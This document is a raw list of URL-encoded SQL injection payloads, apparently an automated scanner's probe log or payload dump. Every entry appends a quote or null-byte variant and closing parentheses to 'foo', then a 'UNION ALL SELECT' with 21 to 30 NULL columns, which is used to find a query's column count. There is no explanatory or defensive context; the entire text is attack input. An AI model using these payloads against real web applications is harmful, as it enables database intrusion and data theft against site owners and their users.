foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 